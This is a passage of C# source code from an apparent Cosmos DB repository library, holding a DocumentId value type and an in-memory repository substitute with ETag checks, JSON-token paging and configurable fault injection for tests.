    // Account endpoint URI (passed to new Uri(...) by the test fixtures).
    public string DbEndPoint { get; set; }
}
}<file_sep>using Newtonsoft.Json;
using System;
using System.Collections.Generic;
namespace CosmosDbRepository.Types
{
/// <summary>
/// Value type wrapping a Cosmos DB document id string, with implicit
/// conversions from string/Guid/int and explicit conversions back.
/// Serialized via <c>DocumentIdJsonConverter</c>.
/// </summary>
[JsonConverter(typeof(DocumentIdJsonConverter))]
public struct DocumentId : IEquatable<DocumentId>
{
    // The underlying id; null for a default-constructed DocumentId.
    public string Id { get; }
    private DocumentId(string id)
    {
        Id = id;
    }
    public override string ToString() => Id;
    // Widening conversions are implicit; narrowing ones (which can throw,
    // e.g. Guid.Parse/int.Parse) are explicit.
    public static implicit operator DocumentId(string id) => new DocumentId(id);
    public static explicit operator string(DocumentId id) => id.Id;
    public static implicit operator DocumentId(Guid id) => new DocumentId(id.ToString());
    public static explicit operator Guid(DocumentId id) => Guid.Parse(id.Id);
    public static implicit operator DocumentId(int id) => new DocumentId(id.ToString());
    public static explicit operator int(DocumentId id) => int.Parse(id.Id);
    public static bool operator ==(DocumentId left, DocumentId right) => left.Equals(right);
    public static bool operator !=(DocumentId left, DocumentId right) => !(left == right);
    // Equality is string equality on the wrapped id.
    public bool Equals(DocumentId other) => Id == other.Id;
    public override bool Equals(object obj)
    {
        // string/Guid/int operands compare via the implicit conversions above,
        // so e.g. (DocumentId)"x" equals "x" and equals Guid/int with the
        // same ToString() representation.
        return obj is DocumentId id && Equals(id) ||
            obj is string stringId && Equals(stringId) ||
            obj is Guid guidId && Equals(guidId) ||
            obj is int intId && Equals(intId);
    }
    // True when the wrapped id is null (default instance) or empty.
    public static bool IsNullOrEmpty(DocumentId id) => string.IsNullOrEmpty(id.Id);
    public override int GetHashCode()
    {
        // EqualityComparer handles a null Id (default instance) safely.
        return 2108858624 + EqualityComparer<string>.Default.GetHashCode(Id);
    }
}
}<file_sep>using CosmosDbRepository.Types;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Net;
using System.Reflection;
using System.Runtime.Serialization;
using System.Threading.Tasks;
namespace CosmosDbRepository.Substitute
{
public class CosmosDbRepositorySubstitute<T>
: ICosmosDbRepository<T>
{
// Backing store for the simulated collection; all access is guarded by lock (_entities).
private readonly List<EntityStorage> _entities = new List<EntityStorage>();
// Registered failure conditions, one list per repository operation. Each
// condition returns a DocumentClientException to fault the matching call,
// or null to let it proceed (populated by the GenerateExceptionOn*When helpers).
private readonly List<Func<T, DocumentClientException>> _addExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<object, DocumentClientException>> _getExceptionConditions = new List<Func<object, DocumentClientException>>();
private readonly List<Func<object, DocumentClientException>> _deleteExceptionConditions = new List<Func<object, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _findExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _findFirstOrDefaultExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<T, DocumentClientException>> _replaceExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _selectExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _selectManyExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<T, DocumentClientException>> _upsertExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _countExceptionConditions = new List<Func<DocumentClientException>>();
// NOTE(review): appears unused in the visible portion of this class — confirm before removing.
private static readonly Type _dbExceptionType = typeof(DocumentClientException);
// Collection identity/links are not simulated.
public string Id => throw new NotImplementedException();
public Type Type => typeof(T);
public Task<string> AltLink => throw new NotImplementedException();
/// <summary>
/// In-memory document create: stores a clone of <paramref name="entity"/>,
/// assigning an id (if empty), a fresh ETag and a timestamp, and faults with
/// Conflict on a duplicate id — mirroring the real service.
/// </summary>
public Task<T> AddAsync(T entity, RequestOptions requestOptions = null)
{
    // FIX: the original used Select(...).FirstOrDefault(), which inspects
    // only the FIRST registered condition; a later condition returning an
    // exception was silently ignored. Take the first non-null failure.
    var failure = _addExceptionConditions.Select(func => func(entity))
                                         .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    var item = new EntityStorage(entity);

    if (DocumentId.IsNullOrEmpty(item.Id))
        item.Id = Guid.NewGuid().ToString();

    lock (_entities)
    {
        if (_entities.Any(cfg => cfg.Id == item.Id))
            throw CreateDbException(HttpStatusCode.Conflict, "Duplicate id");

        item.ETag = $"\"{Guid.NewGuid()}\"";
        item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
        _entities.Add(item);
    }

    return Task.FromResult(DeepClone(item.Entity));
}
/// <summary>
/// Counts stored entities, optionally filtered by <paramref name="predicate"/>
/// and transformed by <paramref name="clauses"/>.
/// </summary>
public Task<int> CountAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions
    // (the original only ever looked at the first condition's result).
    var failure = _countExceptionConditions.Select(func => func())
                                           .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<int>(failure);
    }

    IEnumerable<T> entities;
    lock (_entities)
    {
        // Snapshot under the lock; the LINQ below runs outside it.
        entities = _entities.Select(i => i.Entity).ToArray();
    }

    if (predicate != null)
        entities = entities.Where(predicate.Compile());

    if (clauses != null)
        entities = clauses.Invoke(entities.AsQueryable());

    return Task.FromResult(entities.Count());
}
/// <summary>Collection deletion is not supported by the in-memory substitute.</summary>
public Task<bool> DeleteAsync(RequestOptions requestOptions = null)
    => throw new NotImplementedException();
/// <summary>
/// Deletes the document with <paramref name="itemId"/>; faults the task with
/// NotFound when no such document exists.
/// </summary>
public Task<bool> DeleteDocumentAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
    // FIX: scan all registered conditions for the first non-null failure
    // (the original inspected only the first condition's result).
    var failure = _deleteExceptionConditions.Select(func => func(itemId))
                                            .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<bool>(failure);
    }

    bool removed;
    lock (_entities)
    {
        removed = _entities.RemoveAll(cfg => cfg.Id == itemId) > 0;
    }

    return removed
        ? Task.FromResult(true)
        : Task.FromException<bool>(CreateDbException(HttpStatusCode.NotFound));
}
/// <summary>
/// Deletes the document matching <paramref name="entity"/>'s id, enforcing the
/// ETag (optimistic concurrency) check; faults with NotFound when missing.
/// </summary>
public Task<bool> DeleteDocumentAsync(T entity, RequestOptions requestOptions = null)
{
    var item = new EntityStorage(entity);

    // FIX: for each probe (entity, then id) take the first NON-NULL failure
    // across all conditions; the original only examined the first condition.
    var failure = _deleteExceptionConditions.Select(func => func(entity)).FirstOrDefault(ex => ex != null)
               ?? _deleteExceptionConditions.Select(func => func(item.Id)).FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<bool>(failure);
    }

    lock (_entities)
    {
        var index = _entities.FindIndex(d => d.Id == item.Id);
        if (index < 0)
        {
            return Task.FromException<bool>(CreateDbException(HttpStatusCode.NotFound));
        }

        if (CheckETag(entity, _entities[index], out var exception))
            return Task.FromException<bool>(exception);

        _entities.RemoveAt(index);
        return Task.FromResult(true);
    }
}
/// <summary>Unpaged find: delegates to the paged overload and returns only the items.</summary>
public async Task<IList<T>> FindAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
    => (await FindAsync(feedOptions?.MaxItemCount ?? 0, null, predicate, clauses, feedOptions)).Items;
/// <summary>
/// Paged find. The continuation token is simply the JSON-serialized remainder
/// of a previous page; when present, entities are read from it instead of the store.
/// </summary>
public Task<CosmosDbRepositoryPagedResults<T>> FindAsync(int pageSize, string continuationToken, Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions
    // (the original only ever looked at the first condition's result).
    var failure = _findExceptionConditions.Select(func => func())
                                          .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<CosmosDbRepositoryPagedResults<T>>(failure);
    }

    IEnumerable<T> entities;
    if (string.IsNullOrEmpty(continuationToken))
    {
        lock (_entities)
        {
            entities = _entities.Select(i => i.Entity).ToArray();
        }
    }
    else
    {
        entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
    }

    if (predicate != null)
        entities = entities.Where(predicate.Compile());

    if (clauses != null)
        entities = clauses.Invoke(entities.AsQueryable());

    var result = new CosmosDbRepositoryPagedResults<T>()
    {
        Items = entities.Select(DeepClone).ToList()
    };

    if (pageSize > 0 && pageSize < result.Items.Count)
    {
        // Overflow becomes the continuation token for the next call.
        result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
        result.Items = result.Items.Take(pageSize).ToList();
    }

    return Task.FromResult(result);
}
/// <summary>
/// Returns the first stored entity matching <paramref name="predicate"/> after
/// applying <paramref name="clauses"/>, or default(T) when none match.
/// </summary>
public Task<T> FindFirstOrDefaultAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _findFirstOrDefaultExceptionConditions.Select(func => func())
                                                        .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    IEnumerable<T> entities;
    lock (_entities)
    {
        entities = _entities.Select(i => i.Entity).ToArray();
    }

    if (predicate != null)
        entities = entities.Where(predicate.Compile());

    if (clauses != null)
        entities = clauses.Invoke(entities.AsQueryable());

    return Task.FromResult(entities.FirstOrDefault());
}
/// <summary>Gets the stored document whose id matches <paramref name="entity"/>'s id.</summary>
public Task<T> GetAsync(T entity, RequestOptions requestOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _getExceptionConditions.Select(func => func(entity))
                                         .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    var item = new EntityStorage(entity);
    return GetAsync(item.Id, requestOptions);
}
/// <summary>
/// Gets the stored document with <paramref name="itemId"/>, returning a clone,
/// or default(T) when not found.
/// </summary>
public Task<T> GetAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _getExceptionConditions.Select(func => func(itemId))
                                         .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    EntityStorage item;
    lock (_entities)
    {
        item = _entities.FirstOrDefault(cfg => cfg.Id == itemId);
    }

    return Task.FromResult(item == null ? default : DeepClone(item.Entity));
}
/// <summary>Initialization is not needed (nor supported) by the in-memory substitute.</summary>
public Task Init()
    => throw new NotImplementedException();
/// <summary>
/// Replaces an existing document (matched by id) with <paramref name="entity"/>,
/// enforcing the ETag check and refreshing ETag/timestamp. Throws NotFound when
/// the document does not exist.
/// </summary>
public Task<T> ReplaceAsync(T entity, RequestOptions requestOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions
    // (the original only ever looked at the first condition's result).
    var failure = _replaceExceptionConditions.Select(func => func(entity))
                                             .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    var item = new EntityStorage(entity);

    lock (_entities)
    {
        var index = _entities.FindIndex(d => d.Id == item.Id);
        if (index < 0)
        {
            throw CreateDbException(HttpStatusCode.NotFound, "Not Found");
        }

        if (CheckETag(entity, _entities[index], out var exception))
            return Task.FromException<T>(exception);

        _entities.RemoveAt(index);
        item.ETag = $"\"{Guid.NewGuid()}\"";
        item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
        _entities.Add(item);
    }

    return Task.FromResult(DeepClone(item.Entity));
}
/// <summary>Unpaged projection: delegates to the paged overload and returns only the items.</summary>
public async Task<IList<U>> SelectAsync<U>(Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    => (await SelectAsync(feedOptions?.MaxItemCount ?? 0, default, selector, selectClauses, feedOptions)).Items;
/// <summary>
/// Paged projection of all stored entities through <paramref name="selector"/>.
/// The continuation token is the JSON-serialized remainder of a previous page.
/// </summary>
public Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U>(int pageSize, string continuationToken, Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _selectExceptionConditions.Select(func => func())
                                            .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
    }

    IEnumerable<T> entities;
    if (string.IsNullOrEmpty(continuationToken))
    {
        lock (_entities)
        {
            entities = _entities.Select(i => i.Entity).ToArray();
        }
    }
    else
    {
        entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
    }

    var items = entities.Select(selector.Compile());

    if (selectClauses != null)
        items = selectClauses.Invoke(items.AsQueryable());

    var result = new CosmosDbRepositoryPagedResults<U>()
    {
        Items = items.ToList()
    };

    if (pageSize > 0 && pageSize < result.Items.Count)
    {
        result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
        result.Items = result.Items.Take(pageSize).ToList();
    }

    return Task.FromResult(result);
}
/// <summary>Unpaged filtered projection: delegates to the paged overload and returns only the items.</summary>
public async Task<IList<U>> SelectAsync<U, V>(Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    => (await SelectAsync(feedOptions?.MaxItemCount ?? 0, default, selector, whereClauses, selectClauses, feedOptions)).Items;
/// <summary>
/// Paged projection of entities first shaped by <paramref name="whereClauses"/>
/// then projected through <paramref name="selector"/>. The continuation token is
/// the JSON-serialized remainder of a previous page.
/// </summary>
public Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U, V>(int pageSize, string continuationToken, Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _selectExceptionConditions.Select(func => func())
                                            .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
    }

    IEnumerable<T> entities;
    if (string.IsNullOrEmpty(continuationToken))
    {
        lock (_entities)
        {
            entities = _entities.Select(i => i.Entity).ToArray();
        }
    }
    else
    {
        entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
    }

    var items = whereClauses.Invoke(entities.AsQueryable()).Select(selector.Compile());

    if (selectClauses != null)
        items = selectClauses.Invoke(items.AsQueryable());

    var result = new CosmosDbRepositoryPagedResults<U>()
    {
        Items = items.ToList()
    };

    if (pageSize > 0 && pageSize < result.Items.Count)
    {
        result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
        result.Items = result.Items.Take(pageSize).ToList();
    }

    return Task.FromResult(result);
}
/// <summary>Unpaged flattening projection: delegates to the paged overload and returns only the items.</summary>
public async Task<IList<U>> SelectManyAsync<U>(Expression<Func<T, IEnumerable<U>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
    => (await SelectManyAsync(feedOptions?.MaxItemCount ?? 0, default, selector, whereClauses, selectClauses, feedOptions)).Items;
/// <summary>
/// Paged flattening projection (SelectMany) with optional pre-filter and
/// post-projection clauses. The continuation token is the JSON-serialized
/// remainder of a previous page.
/// </summary>
public Task<CosmosDbRepositoryPagedResults<U>> SelectManyAsync<U>(int pageSize, string continuationToken, Expression<Func<T, IEnumerable<U>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions.
    var failure = _selectManyExceptionConditions.Select(func => func())
                                                .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
    }

    IEnumerable<T> entities;
    if (string.IsNullOrEmpty(continuationToken))
    {
        lock (_entities)
        {
            entities = _entities.Select(i => i.Entity).ToArray();
        }
    }
    else
    {
        entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
    }

    if (whereClauses != null)
        entities = whereClauses.Invoke(entities.AsQueryable());

    var items = entities.SelectMany(selector.Compile());

    if (selectClauses != null)
        items = selectClauses.Invoke(items.AsQueryable());

    var result = new CosmosDbRepositoryPagedResults<U>()
    {
        Items = items.ToList()
    };

    if (pageSize > 0 && pageSize < result.Items.Count)
    {
        result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
        result.Items = result.Items.Take(pageSize).ToList();
    }

    return Task.FromResult(result);
}
/// <summary>
/// Inserts or replaces a document: an existing document with the same id is
/// replaced (after the ETag check); otherwise the entity is added with a new
/// id (if empty), ETag and timestamp.
/// </summary>
public Task<T> UpsertAsync(T entity, RequestOptions requestOptions = null)
{
    // FIX: take the first non-null failure across ALL registered conditions
    // (the original only ever looked at the first condition's result).
    var failure = _upsertExceptionConditions.Select(func => func(entity))
                                            .FirstOrDefault(ex => ex != null);
    if (failure != null)
    {
        return Task.FromException<T>(failure);
    }

    var item = new EntityStorage(entity);

    if (DocumentId.IsNullOrEmpty(item.Id))
        item.Id = Guid.NewGuid().ToString();

    lock (_entities)
    {
        var index = _entities.FindIndex(d => d.Id == item.Id);
        if (index >= 0)
        {
            if (CheckETag(entity, _entities[index], out var exception))
                return Task.FromException<T>(exception);

            _entities.RemoveAt(index);
        }

        item.ETag = $"\"{Guid.NewGuid()}\"";
        item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
        _entities.Add(item);
    }

    return Task.FromResult(DeepClone(item.Entity));
}
public IStoredProcedure<TResult> StoredProcedure<TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam, TResult> StoredProcedure<TParam, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TResult> StoredProcedure<TParam1, TParam2, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TResult> StoredProcedure<TParam1, TParam2, TParam3, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(string id)
{
throw new NotImplementedException();
}
/// <summary>Not supported by this substitute; always throws <see cref="NotImplementedException"/>.</summary>
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(string id)
    => throw new NotImplementedException();
/// <summary>Queues a fault for Get: lookups whose <see cref="DocumentId"/> satisfies <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnGetWhen(Predicate<DocumentId> predicate,
                                         HttpStatusCode statusCode,
                                         string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _getExceptionConditions.Add(id => id is DocumentId docId && predicate(docId)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Queues a fault for Get: entities of type <typeparamref name="T"/> satisfying <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnGetWhen(Predicate<T> predicate,
                                         HttpStatusCode statusCode,
                                         string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _getExceptionConditions.Add(entity => entity is T match && predicate(match)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Get fault conditions.</summary>
internal void ClearGenerateExceptionOnGet() => _getExceptionConditions.Clear();
/// <summary>Queues a fault for Add: entities satisfying <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnAddWhen(Predicate<T> predicate,
                                         HttpStatusCode statusCode,
                                         string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _addExceptionConditions.Add(candidate => predicate(candidate)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Add fault conditions.</summary>
internal void ClearGenerateExceptionOnAdd() => _addExceptionConditions.Clear();
/// <summary>Queues a fault for Delete: deletions whose <see cref="DocumentId"/> satisfies <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnDeleteWhen(Predicate<DocumentId> predicate,
                                            HttpStatusCode statusCode,
                                            string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _deleteExceptionConditions.Add(id => id is DocumentId docId && predicate(docId)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Queues a fault for Delete: entities of type <typeparamref name="T"/> satisfying <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnDeleteWhen(Predicate<T> predicate,
                                            HttpStatusCode statusCode,
                                            string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _deleteExceptionConditions.Add(entity => entity is T match && predicate(match)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Delete fault conditions.</summary>
internal void ClearGenerateExceptionOnDelete() => _deleteExceptionConditions.Clear();
/// <summary>Queues a fault for Find: whenever <paramref name="predicate"/> evaluates true, Find fails with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnFindWhen(Func<bool> predicate,
                                          HttpStatusCode statusCode,
                                          string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _findExceptionConditions.Add(() => predicate()
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Find fault conditions.</summary>
internal void ClearGenerateExceptionOnFind() => _findExceptionConditions.Clear();
/// <summary>Queues a fault for FindFirstOrDefault: whenever <paramref name="predicate"/> evaluates true, the call fails with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnFindFirstOrDefaultWhen(Func<bool> predicate,
                                                        HttpStatusCode statusCode,
                                                        string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _findFirstOrDefaultExceptionConditions.Add(() => predicate()
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued FindFirstOrDefault fault conditions.</summary>
internal void ClearGenerateExceptionOnFindFirstOrDefault() => _findFirstOrDefaultExceptionConditions.Clear();
/// <summary>Queues a fault for Replace: entities satisfying <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnReplaceWhen(Predicate<T> predicate,
                                             HttpStatusCode statusCode,
                                             string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _replaceExceptionConditions.Add(candidate => predicate(candidate)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Replace fault conditions.</summary>
internal void ClearGenerateExceptionOnReplace() => _replaceExceptionConditions.Clear();
/// <summary>Queues a fault for Select: whenever <paramref name="predicate"/> evaluates true, Select fails with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnSelectWhen(Func<bool> predicate,
                                            HttpStatusCode statusCode,
                                            string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _selectExceptionConditions.Add(() => predicate()
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Select fault conditions.</summary>
internal void ClearGenerateExceptionOnSelect() => _selectExceptionConditions.Clear();
/// <summary>Queues a fault for SelectMany: whenever <paramref name="predicate"/> evaluates true, SelectMany fails with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnSelectManyWhen(Func<bool> predicate,
                                                HttpStatusCode statusCode,
                                                string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _selectManyExceptionConditions.Add(() => predicate()
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued SelectMany fault conditions.</summary>
internal void ClearGenerateExceptionOnSelectMany() => _selectManyExceptionConditions.Clear();
/// <summary>Queues a fault for Upsert: entities satisfying <paramref name="predicate"/> fail with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnUpsertWhen(Predicate<T> predicate,
                                            HttpStatusCode statusCode,
                                            string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _upsertExceptionConditions.Add(candidate => predicate(candidate)
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Upsert fault conditions.</summary>
internal void ClearGenerateExceptionOnUpsert() => _upsertExceptionConditions.Clear();
/// <summary>Queues a fault for Count: whenever <paramref name="predicate"/> evaluates true, Count fails with <paramref name="statusCode"/>.</summary>
internal void GenerateExceptionOnCountWhen(Func<bool> predicate,
                                           HttpStatusCode statusCode,
                                           string message = default)
{
    if (predicate is null)
        throw new ArgumentNullException(nameof(predicate));

    _countExceptionConditions.Add(() => predicate()
        ? CreateDbException(statusCode, message)
        : default);
}
/// <summary>Removes all queued Count fault conditions.</summary>
internal void ClearGenerateExceptionOnCount() => _countExceptionConditions.Clear();
/// <summary>Produces an independent copy of <paramref name="src"/> by round-tripping it through JSON; default passes through unchanged.</summary>
private static T DeepClone(T src)
{
    if (src == default)
        return default;

    var json = JsonConvert.SerializeObject(src);
    return JsonConvert.DeserializeObject<T>(json);
}
// Holds one stored document for the in-memory substitute and exposes the entity's Cosmos system
// members ("id", "_etag", "_ts") through accessors compiled once per closed generic type, so the
// substitute can stamp ids/ETags/timestamps without per-call reflection.
private class EntityStorage
{
    // Accessor delegates built from T's JSON-mapped properties in the static constructor.
    private static readonly Action<T, string> SetETag;
    private static readonly Func<T, string> GetETag;
    private static readonly Func<T, DocumentId> GetId;
    private static readonly Action<T, DocumentId> SetId;
    private static readonly Func<T, long> GetTS;
    private static readonly Action<T, long> SetTS;

    // The entity owned by this storage slot (a deep clone of the caller's instance).
    public readonly T Entity;

